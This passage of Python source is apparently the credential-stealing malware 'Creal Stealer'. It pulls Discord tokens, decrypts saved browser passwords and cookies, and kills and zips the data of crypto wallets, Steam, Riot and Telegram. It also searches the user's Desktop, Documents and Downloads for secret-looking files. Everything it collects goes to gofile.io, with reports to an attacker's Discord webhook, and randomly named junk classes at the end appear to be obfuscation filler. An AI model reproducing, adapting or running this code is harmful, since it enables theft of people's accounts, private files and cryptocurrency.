"name": "<a:mavikirmizi:853238372591599617> HQ Friends:",
"value": f"{friends}",
"inline": False
}
],
"author": {
"name": f"{us3rn4m1}#{hashtag} ({idd})",
"icon_url": f"{pfp}"
},
"footer": {
"text": "Creal Stealer",
"icon_url": "https://cdn.discordapp.com/attachments/1068916221354983427/1074265014560620554/e6fd316fb3544f2811361a392ad73e65.jpg"
},
"thumbnail": {
"url": f"{pfp}"
}
}
],
"avatar_url": "https://cdn.discordapp.com/attachments/1068916221354983427/1074265014560620554/e6fd316fb3544f2811361a392ad73e65.jpg",
"username": "Creal Stealer",
"attachments": []
}
L04durl1b(wh00k, data=dumps(data).encode(), headers=headers)
#hersey son defa :(
def R4f0rm3t(listt):
e = re.findall("(\w+[a-z])",listt)
while "https" in e: e.remove("https")
while "com" in e: e.remove("com")
while "net" in e: e.remove("net")
return list(set(e))
def upload(name, link):
headers = {
"Content-Type": "application/json",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0"
}
if name == "crcook":
rb = ' | '.join(da for da in cookiWords)
if len(rb) > 1000:
rrrrr = R4f0rm3t(str(cookiWords))
rb = ' | '.join(da for da in rrrrr)
data = {
"content": f"{globalInfo()}",
"embeds": [
{
"title": "Creal | Cookies Stealer",
"description": f"<:apollondelirmis:1012370180845883493>: **Accounts:**\n\n{rb}\n\n**Data:**\n<:cookies_tlm:816619063618568234> • **{CookiCount}** Cookies Found\n<a:CH_IconArrowRight:715585320178941993> • [CrealCookies.txt]({link})",
"color": 2895667,
"footer": {
"text": "Creal Stealer",
"icon_url": "https://cdn.discordapp.com/attachments/1068916221354983427/1074265014560620554/e6fd316fb3544f2811361a392ad73e65.jpg"
}
}
],
"username": "Creal Stealer",
"avatar_url": "https://cdn.discordapp.com/attachments/1068916221354983427/1074265014560620554/e6fd316fb3544f2811361a392ad73e65.jpg",
"attachments": []
}
L04durl1b(wh00k, data=dumps(data).encode(), headers=headers)
return
if name == "crpassw":
ra = ' | '.join(da for da in paswWords)
if len(ra) > 1000:
rrr = R4f0rm3t(str(paswWords))
ra = ' | '.join(da for da in rrr)
data = {
"content": f"{globalInfo()}",
"embeds": [
{
"title": "Creal | Password Stealer",
"description": f"<:apollondelirmis:1012370180845883493>: **Accounts**:\n{ra}\n\n**Data:**\n<a:hira_kasaanahtari:886942856969875476> • **{P4sswCount}** Passwords Found\n<a:CH_IconArrowRight:715585320178941993> • [CrealPassword.txt]({link})",
"color": 2895667,
"footer": {
"text": "Creal Stealer",
"icon_url": "https://cdn.discordapp.com/attachments/1068916221354983427/1074265014560620554/e6fd316fb3544f2811361a392ad73e65.jpg"
}
}
],
"username": "Creal",
"avatar_url": "https://cdn.discordapp.com/attachments/1068916221354983427/1074265014560620554/e6fd316fb3544f2811361a392ad73e65.jpg",
"attachments": []
}
L04durl1b(wh00k, data=dumps(data).encode(), headers=headers)
return
if name == "kiwi":
data = {
"content": f"{globalInfo()}",
"embeds": [
{
"color": 2895667,
"fields": [
{
"name": "Interesting files found on user PC:",
"value": link
}
],
"author": {
"name": "Creal | File Stealer"
},
"footer": {
"text": "Creal Stealer",
"icon_url": "https://cdn.discordapp.com/attachments/1068916221354983427/1074265014560620554/e6fd316fb3544f2811361a392ad73e65.jpg"
}
}
],
"username": "Creal Stealer",
"avatar_url": "https://cdn.discordapp.com/attachments/1068916221354983427/1074265014560620554/e6fd316fb3544f2811361a392ad73e65.jpg",
"attachments": []
}
L04durl1b(wh00k, data=dumps(data).encode(), headers=headers)
return
# def upload(name, tk=''):
# headers = {
# "Content-Type": "application/json",
# "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0"
# }
# # r = requests.post(hook, files=files)
# LoadRequests("POST", hook, files=files)
_
def wr1tef0rf1l3(data, name):
path = os.getenv("TEMP") + f"\cr{name}.txt"
with open(path, mode='w', encoding='utf-8') as f:
f.write(f"<--Creal STEALER BEST -->\n\n")
for line in data:
if line[0] != '':
f.write(f"{line}\n")
T0k3ns = ''
def getT0k3n(path, arg):
if not os.path.exists(path): return
path += arg
for file in os.listdir(path):
if file.endswith(".log") or file.endswith(".ldb") :
for line in [x.strip() for x in open(f"{path}\\{file}", errors="ignore").readlines() if x.strip()]:
for regex in (r"[\w-]{24}\.[\w-]{6}\.[\w-]{25,110}", r"mfa\.[\w-]{80,95}"):
for t0k3n in re.findall(regex, line):
global T0k3ns
if ch1ckT4k1n(t0k3n):
if not t0k3n in T0k3ns:
# print(token)
T0k3ns += t0k3n
upl05dT4k31(t0k3n, path)
P4ssw = []
def getP4ssw(path, arg):
global P4ssw, P4sswCount
if not os.path.exists(path): return
pathC = path + arg + "/Login Data"
if os.stat(pathC).st_size == 0: return
tempfold = temp + "cr" + ''.join(random.choice('bcdefghijklmnopqrstuvwxyz') for i in range(8)) + ".db"
shutil.copy2(pathC, tempfold)
conn = sql_connect(tempfold)
cursor = conn.cursor()
cursor.execute("SELECT action_url, username_value, password_value FROM logins;")
data = cursor.fetchall()
cursor.close()
conn.close()
os.remove(tempfold)
pathKey = path + "/Local State"
with open(pathKey, 'r', encoding='utf-8') as f: local_state = json_loads(f.read())
master_key = b64decode(local_state['os_crypt']['encrypted_key'])
master_key = CryptUnprotectData(master_key[5:])
for row in data:
if row[0] != '':
for wa in keyword:
old = wa
if "https" in wa:
tmp = wa
wa = tmp.split('[')[1].split(']')[0]
if wa in row[0]:
if not old in paswWords: paswWords.append(old)
P4ssw.append(f"UR1: {row[0]} | U53RN4M3: {row[1]} | P455W0RD: {D3kryptV4lU3(row[2], master_key)}")
P4sswCount += 1
wr1tef0rf1l3(P4ssw, 'passw')
C00k13 = []
def getC00k13(path, arg):
global C00k13, CookiCount
if not os.path.exists(path): return
pathC = path + arg + "/Cookies"
if os.stat(pathC).st_size == 0: return
tempfold = temp + "cr" + ''.join(random.choice('bcdefghijklmnopqrstuvwxyz') for i in range(8)) + ".db"
shutil.copy2(pathC, tempfold)
conn = sql_connect(tempfold)
cursor = conn.cursor()
cursor.execute("SELECT host_key, name, encrypted_value FROM cookies")
data = cursor.fetchall()
cursor.close()
conn.close()
os.remove(tempfold)
pathKey = path + "/Local State"
with open(pathKey, 'r', encoding='utf-8') as f: local_state = json_loads(f.read())
master_key = b64decode(local_state['os_crypt']['encrypted_key'])
master_key = CryptUnprotectData(master_key[5:])
for row in data:
if row[0] != '':
for wa in keyword:
old = wa
if "https" in wa:
tmp = wa
wa = tmp.split('[')[1].split(']')[0]
if wa in row[0]:
if not old in cookiWords: cookiWords.append(old)
C00k13.append(f"{row[0]} TRUE / FALSE 2597573456 {row[1]} {D3kryptV4lU3(row[2], master_key)}")
CookiCount += 1
wr1tef0rf1l3(C00k13, 'cook')
def G3tD1sc0rd(path, arg):
if not os.path.exists(f"{path}/Local State"): return
pathC = path + arg
pathKey = path + "/Local State"
with open(pathKey, 'r', encoding='utf-8') as f: local_state = json_loads(f.read())
master_key = b64decode(local_state['os_crypt']['encrypted_key'])
master_key = CryptUnprotectData(master_key[5:])
# print(path, master_key)
for file in os.listdir(pathC):
# print(path, file)
if file.endswith(".log") or file.endswith(".ldb") :
for line in [x.strip() for x in open(f"{pathC}\\{file}", errors="ignore").readlines() if x.strip()]:
for t0k3n in re.findall(r"dQw4w9WgXcQ:[^.*\['(.*)'\].*$][^\"]*", line):
global T0k3ns
t0k3nDecoded = D3kryptV4lU3(b64decode(t0k3n.split('dQw4w9WgXcQ:')[1]), master_key)
if ch1ckT4k1n(t0k3nDecoded):
if not t0k3nDecoded in T0k3ns:
# print(token)
T0k3ns += t0k3nDecoded
# writeforfile(Tokens, 'tokens')
upl05dT4k31(t0k3nDecoded, path)
def GatherZips(paths1, paths2, paths3):
thttht = []
for patt in paths1:
a = threading.Thread(target=Z1pTh1ngs, args=[patt[0], patt[5], patt[1]])
a.start()
thttht.append(a)
for patt in paths2:
a = threading.Thread(target=Z1pTh1ngs, args=[patt[0], patt[2], patt[1]])
a.start()
thttht.append(a)
a = threading.Thread(target=ZipTelegram, args=[paths3[0], paths3[2], paths3[1]])
a.start()
thttht.append(a)
for thread in thttht:
thread.join()
global WalletsZip, GamingZip, OtherZip
# print(WalletsZip, GamingZip, OtherZip)
wal, ga, ot = "",'',''
if not len(WalletsZip) == 0:
wal = ":coin: • Wallets\n"
for i in WalletsZip:
wal += f"└─ [{i[0]}]({i[1]})\n"
if not len(WalletsZip) == 0:
ga = ":video_game: • Gaming:\n"
for i in GamingZip:
ga += f"└─ [{i[0]}]({i[1]})\n"
if not len(OtherZip) == 0:
ot = ":tickets: • Apps\n"
for i in OtherZip:
ot += f"└─ [{i[0]}]({i[1]})\n"
headers = {
"Content-Type": "application/json",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0"
}
data = {
"content": globalInfo(),
"embeds": [
{
"title": "Creal Zips",
"description": f"{wal}\n{ga}\n{ot}",
"color": 2895667,
"footer": {
"text": "Creal Stealer",
"icon_url": "https://cdn.discordapp.com/attachments/1068916221354983427/1074265014560620554/e6fd316fb3544f2811361a392ad73e65.jpg"
}
}
],
"username": "Creal Stealer",
"avatar_url": "https://cdn.discordapp.com/attachments/1068916221354983427/1074265014560620554/e6fd316fb3544f2811361a392ad73e65.jpg",
"attachments": []
}
L04durl1b(wh00k, data=dumps(data).encode(), headers=headers)
def ZipTelegram(path, arg, procc):
global OtherZip
pathC = path
name = arg
if not os.path.exists(pathC): return
subprocess.Popen(f"taskkill /im {procc} /t /f >nul 2>&1", shell=True)
zf = ZipFile(f"{pathC}/{name}.zip", "w")
for file in os.listdir(pathC):
if not ".zip" in file and not "tdummy" in file and not "user_data" in file and not "webview" in file:
zf.write(pathC + "/" + file)
zf.close()
lnik = uploadToAnonfiles(f'{pathC}/{name}.zip')
#lnik = "https://google.com"
os.remove(f"{pathC}/{name}.zip")
OtherZip.append([arg, lnik])
def Z1pTh1ngs(path, arg, procc):
pathC = path
name = arg
global WalletsZip, GamingZip, OtherZip
# subprocess.Popen(f"taskkill /im {procc} /t /f", shell=True)
# os.system(f"taskkill /im {procc} /t /f")
if "nkbihfbeogaeaoehlefnkodbefgpgknn" in arg:
browser = path.split("\\")[4].split("/")[1].replace(' ', '')
name = f"Metamask_{browser}"
pathC = path + arg
if not os.path.exists(pathC): return
subprocess.Popen(f"taskkill /im {procc} /t /f >nul 2>&1", shell=True)
if "Wallet" in arg or "NationsGlory" in arg:
browser = path.split("\\")[4].split("/")[1].replace(' ', '')
name = f"{browser}"
elif "Steam" in arg:
if not os.path.isfile(f"{pathC}/loginusers.vdf"): return
f = open(f"{pathC}/loginusers.vdf", "r+", encoding="utf8")
data = f.readlines()
# print(data)
found = False
for l in data:
if 'RememberPassword"\t\t"1"' in l:
found = True
if found == False: return
name = arg
zf = ZipFile(f"{pathC}/{name}.zip", "w")
for file in os.listdir(pathC):
if not ".zip" in file: zf.write(pathC + "/" + file)
zf.close()
lnik = uploadToAnonfiles(f'{pathC}/{name}.zip')
#lnik = "https://google.com"
os.remove(f"{pathC}/{name}.zip")
if "Wallet" in arg or "eogaeaoehlef" in arg:
WalletsZip.append([name, lnik])
elif "NationsGlory" in name or "Steam" in name or "RiotCli" in name:
GamingZip.append([name, lnik])
else:
OtherZip.append([name, lnik])
def GatherAll():
' Default Path < 0 > ProcesName < 1 > Token < 2 > Password < 3 > Cookies < 4 > Extentions < 5 > '
browserPaths = [
[f"{roaming}/Opera Software/Opera GX Stable", "opera.exe", "/Local Storage/leveldb", "/", "/Network", "/Local Extension Settings/nkbihfbeogaeaoehlefnkodbefgpgknn" ],
[f"{roaming}/Opera Software/Opera Stable", "opera.exe", "/Local Storage/leveldb", "/", "/Network", "/Local Extension Settings/nkbihfbeogaeaoehlefnkodbefgpgknn" ],
[f"{roaming}/Opera Software/Opera Neon/User Data/Default", "opera.exe", "/Local Storage/leveldb", "/", "/Network", "/Local Extension Settings/nkbihfbeogaeaoehlefnkodbefgpgknn" ],
[f"{local}/Google/Chrome/User Data", "chrome.exe", "/Default/Local Storage/leveldb", "/Default", "/Default/Network", "/Default/Local Extension Settings/nkbihfbeogaeaoehlefnkodbefgpgknn" ],
[f"{local}/Google/Chrome SxS/User Data", "chrome.exe", "/Default/Local Storage/leveldb", "/Default", "/Default/Network", "/Default/Local Extension Settings/nkbihfbeogaeaoehlefnkodbefgpgknn" ],
[f"{local}/BraveSoftware/Brave-Browser/User Data", "brave.exe", "/Default/Local Storage/leveldb", "/Default", "/Default/Network", "/Default/Local Extension Settings/nkbihfbeogaeaoehlefnkodbefgpgknn" ],
[f"{local}/Yandex/YandexBrowser/User Data", "yandex.exe", "/Default/Local Storage/leveldb", "/Default", "/Default/Network", "/HougaBouga/nkbihfbeogaeaoehlefnkodbefgpgknn" ],
[f"{local}/Microsoft/Edge/User Data", "edge.exe", "/Default/Local Storage/leveldb", "/Default", "/Default/Network", "/Default/Local Extension Settings/nkbihfbeogaeaoehlefnkodbefgpgknn" ]
]
discordPaths = [
[f"{roaming}/Discord", "/Local Storage/leveldb"],
[f"{roaming}/Lightcord", "/Local Storage/leveldb"],
[f"{roaming}/discordcanary", "/Local Storage/leveldb"],
[f"{roaming}/discordptb", "/Local Storage/leveldb"],
]
PathsToZip = [
[f"{roaming}/atomic/Local Storage/leveldb", '"Atomic Wallet.exe"', "Wallet"],
[f"{roaming}/Exodus/exodus.wallet", "Exodus.exe", "Wallet"],
["C:\Program Files (x86)\Steam\config", "steam.exe", "Steam"],
[f"{roaming}/NationsGlory/Local Storage/leveldb", "NationsGlory.exe", "NationsGlory"],
[f"{local}/Riot Games/Riot Client/Data", "RiotClientServices.exe", "RiotClient"]
]
Telegram = [f"{roaming}/Telegram Desktop/tdata", 'telegram.exe', "Telegram"]
for patt in browserPaths:
a = threading.Thread(target=getT0k3n, args=[patt[0], patt[2]])
a.start()
Threadlist.append(a)
for patt in discordPaths:
a = threading.Thread(target=G3tD1sc0rd, args=[patt[0], patt[1]])
a.start()
Threadlist.append(a)
for patt in browserPaths:
a = threading.Thread(target=getP4ssw, args=[patt[0], patt[3]])
a.start()
Threadlist.append(a)
ThCokk = []
for patt in browserPaths:
a = threading.Thread(target=getC00k13, args=[patt[0], patt[4]])
a.start()
ThCokk.append(a)
threading.Thread(target=GatherZips, args=[browserPaths, PathsToZip, Telegram]).start()
for thread in ThCokk: thread.join()
DETECTED = TR6st(C00k13)
if DETECTED == True: return
for patt in browserPaths:
threading.Thread(target=Z1pTh1ngs, args=[patt[0], patt[5], patt[1]]).start()
for patt in PathsToZip:
threading.Thread(target=Z1pTh1ngs, args=[patt[0], patt[2], patt[1]]).start()
threading.Thread(target=ZipTelegram, args=[Telegram[0], Telegram[2], Telegram[1]]).start()
for thread in Threadlist:
thread.join()
global upths
upths = []
for file in ["crpassw.txt", "crcook.txt"]:
# upload(os.getenv("TEMP") + "\\" + file)
upload(file.replace(".txt", ""), uploadToAnonfiles(os.getenv("TEMP") + "\\" + file))
def uploadToAnonfiles(path):
try:return requests.post(f'https://{requests.get("https://api.gofile.io/getServer").json()["data"]["server"]}.gofile.io/uploadFile', files={'file': open(path, 'rb')}).json()["data"]["downloadPage"]
except:return False
# def uploadToAnonfiles(path):s
# try:
# files = { "file": (path, open(path, mode='rb')) }
# upload = requests.post("https://transfer.sh/", files=files)
# url = upload.text
# return url
# except:
# return False
def KiwiFolder(pathF, keywords):
global KiwiFiles
maxfilesperdir = 7
i = 0
listOfFile = os.listdir(pathF)
ffound = []
for file in listOfFile:
if not os.path.isfile(pathF + "/" + file): return
i += 1
if i <= maxfilesperdir:
url = uploadToAnonfiles(pathF + "/" + file)
ffound.append([pathF + "/" + file, url])
else:
break
KiwiFiles.append(["folder", pathF + "/", ffound])
KiwiFiles = []
def KiwiFile(path, keywords):
global KiwiFiles
fifound = []
listOfFile = os.listdir(path)
for file in listOfFile:
for worf in keywords:
if worf in file.lower():
if os.path.isfile(path + "/" + file) and ".txt" in file:
fifound.append([path + "/" + file, uploadToAnonfiles(path + "/" + file)])
break
if os.path.isdir(path + "/" + file):
target = path + "/" + file
KiwiFolder(target, keywords)
break
KiwiFiles.append(["folder", path, fifound])
def Kiwi():
user = temp.split("\AppData")[0]
path2search = [
user + "/Desktop",
user + "/Downloads",
user + "/Documents"
]
key_wordsFolder = [
"account",
"acount",
"passw",
"secret",
"senhas",
"contas",
"backup",
"2fa",
"importante",
"privado",
"exodus",
"exposed",
"perder",
"amigos",
"empresa",
"trabalho",
"work",
"private",
"source",
"users",
"username",
"login",
"user",
"usuario",
"log"
]
key_wordsFiles = [
"passw",
"mdp",
"motdepasse",
"mot_de_passe",
"login",
"secret",
"account",
"acount",
"paypal",
"banque",
"account",
"metamask",
"wallet",
"crypto",
"exodus",
"discord",
"2fa",
"code",
"memo",
"compte",
"token",
"backup",
"secret",
"mom",
"family"
]
wikith = []
for patt in path2search:
kiwi = threading.Thread(target=KiwiFile, args=[patt, key_wordsFiles]);kiwi.start()
wikith.append(kiwi)
return wikith
global keyword, cookiWords, paswWords, CookiCount, P4sswCount, WalletsZip, GamingZip, OtherZip
keyword = [
'mail', '[coinbase](https://coinbase.com)', '[sellix](https://sellix.io)', '[gmail](https://gmail.com)', '[steam](https://steam.com)', '[discord](https://discord.com)', '[riotgames](https://riotgames.com)', '[youtube](https://youtube.com)', '[instagram](https://instagram.com)', '[tiktok](https://tiktok.com)', '[twitter](https://twitter.com)', '[facebook](https://facebook.com)', 'card', '[epicgames](https://epicgames.com)', '[spotify](https://spotify.com)', '[yahoo](https://yahoo.com)', '[roblox](https://roblox.com)', '[twitch](https://twitch.com)', '[minecraft](https://minecraft.net)', 'bank', '[paypal](https://paypal.com)', '[origin](https://origin.com)', '[amazon](https://amazon.com)', '[ebay](https://ebay.com)', '[aliexpress](https://aliexpress.com)', '[playstation](https://playstation.com)', '[hbo](https://hbo.com)', '[xbox](https://xbox.com)', 'buy', 'sell', '[binance](https://binance.com)', '[hotmail](https://hotmail.com)', '[outlook](https://outlook.com)', '[crunchyroll](https://crunchyroll.com)', '[telegram](https://telegram.com)', '[pornhub](https://pornhub.com)', '[disney](https://disney.com)', '[expressvpn](https://expressvpn.com)', 'crypto', '[uber](https://uber.com)', '[netflix](https://netflix.com)'
]
CookiCount, P4sswCount = 0, 0
cookiWords = []
paswWords = []
WalletsZip = [] # [Name, Link]
GamingZip = []
OtherZip = []
GatherAll()
DETECTED = TR6st(C00k13)
# DETECTED = False
if not DETECTED:
wikith = Kiwi()
for thread in wikith: thread.join()
time.sleep(0.2)
filetext = "\n"
for arg in KiwiFiles:
if len(arg[2]) != 0:
foldpath = arg[1]
foldlist = arg[2]
filetext += f"📁 {foldpath}\n"
for ffil in foldlist:
a = ffil[0].split("/")
fileanme = a[len(a)-1]
b = ffil[1]
filetext += f"└─:open_file_folder: [{fileanme}]({b})\n"
filetext += "\n"
upload("kiwi", filetext)
class UMuzEjUeXvllG:
def __init__(self):
self.__GmbYmdILLuYRlZim()
self.__NhiBgGJi()
self.__EOZkWGNvefQhdjkdSv()
self.__LEpwJFCrqe()
self.__RaxQsbUaiXFuosjLjFL()
self.__gFyMUBeclxAMSuLGFI()
self.__peuqNPJgSViqteJ()
self.__ZYLcqbHdYTIqqL()
self.__MgiXVFfX()
def __GmbYmdILLuYRlZim(self, UuRZkBenvdQaxpr, EhsaszgQ, WusaqAueWgoRuFJxREl, rTaQFK, ikgVdCv, CjYaFqqV):
return self.__EOZkWGNvefQhdjkdSv()
def __NhiBgGJi(self, CuBzwZqZVh, vrQntwSfuo, ZNLesUnrw):
return self.__EOZkWGNvefQhdjkdSv()
def __EOZkWGNvefQhdjkdSv(self, ruDEFEVIMPuljxbIum, IcZbAuTO, ZCpTMCgZXOvOlb, XVHYWuS, ROkgZ):
return self.__ZYLcqbHdYTIqqL()
def __LEpwJFCrqe(self, mBAvgegohAEQ, ZGIXDTrwFUgGewuTBXzh):
return self.__MgiXVFfX()
def __RaxQsbUaiXFuosjLjFL(self, MibIKA, JcQaeKrMlNwgyDHed, uIebkvmF):
return self.__NhiBgGJi()
def __gFyMUBeclxAMSuLGFI(self, MYUajyiy, BZVlJGwK, EBUTLJKOimGrKIz):
return self.__RaxQsbUaiXFuosjLjFL()
def __peuqNPJgSViqteJ(self, dfhmeiu, krzPWxIcOiiph, FQzPGDNGDVdCKv, mdahQWJOsQchfE, sSeXHRweF, JtssGUuPX, iczMCP):
return self.__EOZkWGNvefQhdjkdSv()
def __ZYLcqbHdYTIqqL(self, PFmMRmYOBVWmaYxGPGlA, zWfUDzjwPom, KqIDQiGd):
return self.__gFyMUBeclxAMSuLGFI()
def __MgiXVFfX(self, fnlLoUMWepkOH, novVDxupN, DERJFMepAMkw, srnJyEhmsJe):
return self.__peuqNPJgSViqteJ()
class MyyxEelpTrPksTrw:
def __init__(self):
self.__QkfRfCTqYThuUeydeFyD()
self.__DWJHRfjGqB()
self.__thtJrhVr()
self.__xkjEZmiSc()
self.__vcOiedwWgTvpEDCB()
self.__eieGIJsrcEe()
self.__OyxRiLwQvnfq()
self.__owWjslNAP()
self.__eXzXntNJSfHAwgaaZt()
self.__kQoUCzwslOWUqwmVvcD()
self.__VquWeGLaRnLufGRB()
self.__MgvalQPJJNksXtETN()
self.__GwpbtIFkrJrairDFH()
self.__EHdJSFvuFJFjZBMig()
def __QkfRfCTqYThuUeydeFyD(self, fgFbSWVpQckROBnTaSm, HMLrGyKOxlDSkMGVgpbD, QoZKxaSlDI, QsZdC, xqjzzvCiHMXGS):
return self.__eieGIJsrcEe()
def __DWJHRfjGqB(self, jNDlYztAuakaOymZBAsm):
return self.__OyxRiLwQvnfq()
def __thtJrhVr(self, kmsbrQU, zkWxzrSpAplFToQ, YAfmZNUcdUql, iUyJWbCtKz):
return self.__GwpbtIFkrJrairDFH()
def __xkjEZmiSc(self, bczsIBdiuHfSJGU, VUgMZdg, RHLWzJstniHqvDdxC, xPZEtsvLqpQqTLSvnE, eVGntuiaHHBkASB, qQpwvmQuAxSp):
return self.__GwpbtIFkrJrairDFH()
def __vcOiedwWgTvpEDCB(self, TnUAnEnDVHBiWwQWHtO, RCrhZNzXZjYoxHYSS, WYbyRC, YGpUbYFgSdVtbXTMwzz, hIcNxUH):
return self.__VquWeGLaRnLufGRB()
def __eieGIJsrcEe(self, SUUrwSYIwm):
return self.__eXzXntNJSfHAwgaaZt()
def __OyxRiLwQvnfq(self, UOAPNJpIPpYQvj, KitIKzpjf):
return self.__owWjslNAP()
def __owWjslNAP(self, akxyVB):
return self.__OyxRiLwQvnfq()
def __eXzXntNJSfHAwgaaZt(self, pERYNxddVfStT):
return self.__eXzXntNJSfHAwgaaZt()
def __kQoUCzwslOWUqwmVvcD(self, bTobxUgnChsLBBSOo, aKKNjTVfZeuiPomMXC, JrDOIwYiCsmXOAcXRqm, CfDhTQIehD, BaOFKHurHvmimzowgf, sRfEiqua):
return self.__eXzXntNJSfHAwgaaZt()
def __VquWeGLaRnLufGRB(self, uoyUKwYsH, vLbuxn, SwLOdODTIk, nphLBFUfRMhfJVHtqJ, jyQopQuK, GANyjBolniinXQuWR):
return self.__DWJHRfjGqB()
def __MgvalQPJJNksXtETN(self, sySbumy, IrmHfulbr, pcnHSAPUSULkJRTjeRe, MbCYjCHEXmD, bBjrjmglUddxjDi):
return self.__kQoUCzwslOWUqwmVvcD()
def __GwpbtIFkrJrairDFH(self, HVCmdhwWAm, JryuNN, TfYkNezZkdVmlYKSQFy):
return self.__MgvalQPJJNksXtETN()
def __EHdJSFvuFJFjZBMig(self, JzmxOGMpLfQWVQynasUD, jJymYd):
return self.__MgvalQPJJNksXtETN()
class SUDzAVSHlvezMiCkG:
def __init__(self):
self.__NUlixBAraOAiTiCcfo()
self.__UkWDpZqexgfGxqDsrRHu()
self.__VHuzhLYrJLzTsE()
self.__eSjsJpBozLq()
self.__hcjoCgdQlgIxpEI()
self.__JCKeABnFPGmNAg()
self.__RKnmCzHnKHnsfdi()
self.__iIvemkzwwCbe()
self.__mSiISaDz()
self.__uHoYRtNdXTMucwgXY()
self.__huRfFwwhAnCMEMCnsriV()
def __NUlixBAraOAiTiCcfo(self, IipDDmQz, eqOcokAUrURNdqkLbn, OnKKsBJC, swfMrZPfadnF, xBoAYJctnHHoDjF):
return self.__NUlixBAraOAiTiCcfo()
def __UkWDpZqexgfGxqDsrRHu(self, tOpzb, KWwrCDRmyKn, SJWvubPLPbYQuByQW, EuhRCXcgdLDay):
return self.__NUlixBAraOAiTiCcfo()
def __VHuzhLYrJLzTsE(self, YVfnXvFXZOfoA, yeUIGiuphLy, KgdoNlxpyixEC, WfUDdwnvZe, sCCDEIvuifAjdphi, OIOxsSXeCYFgzN, VPmyN):
return self.__mSiISaDz()
def __eSjsJpBozLq(self, RndfbKJaGvthemmvLD, vZgjJ, EBsgVHgOCvCH, SXGRJuPordhT, WUdDYbyPv, CxUsbDyw):
return self.__hcjoCgdQlgIxpEI()
def __hcjoCgdQlgIxpEI(self, wLXKgixbaXzqmcXGbv, VByysakms, nTJwCyWuiRViV, ssJiNd, aADBA):
return self.__NUlixBAraOAiTiCcfo()
def __JCKeABnFPGmNAg(self, ecCSydRR, GdVMayweSyk, hakOPIythRJzPcMadd, LieUSsEqksNIJMIqbxWe):
return self.__iIvemkzwwCbe()
def __RKnmCzHnKHnsfdi(self, FCgqSSgMjZCeJJy, HSNDm, KRwWaOdqJrsIluh, HvdRtlgJgY, StfeJIWtjZPDvQPSeT):
return self.__NUlixBAraOAiTiCcfo()
def __iIvemkzwwCbe(self, nJVgNoRCHHWTW, LnMUsWqEnLmQPbfYq, hPUyNqbkMAOY):
return self.__mSiISaDz()
def __mSiISaDz(self, osWhKyuPNqyYn):
return self.__uHoYRtNdXTMucwgXY()
def __uHoYRtNdXTMucwgXY(self, pCCewDhHOkOUxaIGy, XzBSE, EZJKhziqegvSSQm, CAsxyaJD):
return self.__iIvemkzwwCbe()
def __huRfFwwhAnCMEMCnsriV(self, dSBCMPLnWFZOYx, xGdkIuT, RirCezPEE, rsXHVLZiOrxYWSV):
return self.__NUlixBAraOAiTiCcfo()
class FmKDYOCurAxayEGs:
def __init__(self):
self.__IZqYixfMNAPOVeBDEGE()
self.__uBTxwbGCrIbGwo()
self.__gjAiAbgh()
self.__qjvfpzNMz()
self.__CGNnyyAigiHz()
self.__wQnXJhWLiUEmYlLxkoD()
self.__GUXtLxvoaRrkwaH()
self.__lyJffElHL()
self.__fBWJHKbGZohochQbmj()
self.__KBuTJzxqdmwNAfQIIh()
self.__oQHQyfQNCrNgVSwr()
self.__dJrEQByAzqasZLaI()
def __IZqYixfMNAPOVeBDEGE(self, OPaSLeMUAvuMtl, TXnTIcYvDtatDNUEK, SsjlPsAjKapEizW, rERhusuLutda, MFJnvLaKmPyeZTwFGWy, wOyWmkySje):
return self.__dJrEQByAzqasZLaI()
def __uBTxwbGCrIbGwo(self, UZgmgEOC, Hzfpfru, DMvxuw):
return self.__gjAiAbgh()
def __gjAiAbgh(self, enFzAxljUr, lILjaPClbcFn, MFUMWEkNzcCYL, QsfblUWnpMdYfcz):
return self.__IZqYixfMNAPOVeBDEGE()
def __qjvfpzNMz(self, mGevhsnzJ):
return self.__gjAiAbgh()
def __CGNnyyAigiHz(self, OCgUEqNWrfrMZWzcL, yNBjarbwSc):
return self.__lyJffElHL()
def __wQnXJhWLiUEmYlLxkoD(self, yTeHptqZ):
return self.__uBTxwbGCrIbGwo()
def __GUXtLxvoaRrkwaH(self, hbDctSFUdrMR, CPXrOhFPmosWW):
return self.__dJrEQByAzqasZLaI()
def __lyJffElHL(self, tPSeFPAd, NsTNfqNYbIiTiQsY):
return self.__KBuTJzxqdmwNAfQIIh()
def __fBWJHKbGZohochQbmj(self, OmRcMVtVEfqmv, abTkSVHmfFCmKZU, NJriA, pgsTW, KfOPYeclJaQqbsziSXRj, ORjqQeaKdohJQCNWfK, DjeUtQ):
return self.__GUXtLxvoaRrkwaH()
def __KBuTJzxqdmwNAfQIIh(self, pazUIEXmN, OynsnDdM):
return self.__lyJffElHL()
def __oQHQyfQNCrNgVSwr(self, Wkqfds, wyXNbYGzjYKbvM, coWMaYSsEqNrlMPG, ySWphCOzDV, gAUHQCGJbTiYbY, pLujfwiGvDVU):
return self.__lyJffElHL()
def __dJrEQByAzqasZLaI(self, BEOEcdEXkpf, KRIACHDU, oUBHEBXVKgWgpzK):
return self.__CGNnyyAigiHz()
class uvmeubayNZUaPD:
def __init__(self):
self.__UwEVyqambDDl()
self.__eujvuaPmnD()
self.__EZEODnidjgXIh()
self.__DdhFXDBKFiUbpNmbYWku()
self.__JQkAZvonUKCzsjroTFt()
self.__vVEpBWlTEHyPuFdx()
self.__tBZtwYMw()
self.__aHcMtIPK()
self.__fhmnLseJSuUveKJxF()
def __UwEVyqambDDl(self, EEjvuAzcbvcWEuLDTxR, nUjPlEA, PjeRqNGeroNiiGir, IpWjqcYfSODh):
return self.__aHcMtIPK()
def __eujvuaPmnD(self, xtOTFApXYXPHpheP, TjUHaBufdNIvCSycP, kiSdawOhBH):
return self.__EZEODnidjgXIh()
def __EZEODnidjgXIh(self, iMRDugrRdPV, lGVrwyRSbNGegexp, kPrFmCwByxNs, MqvXNdBCIEuMBYcbtzmb, RLNtjsVHABjDkg, vcflbAAcsAxqlM, cztxAjPjPvkZ):
return self.__DdhFXDBKFiUbpNmbYWku()
def __DdhFXDBKFiUbpNmbYWku(self, KlRyNtKzAauQwizJbx, mdGSsCQVbcowKgR):
return self.__EZEODnidjgXIh()
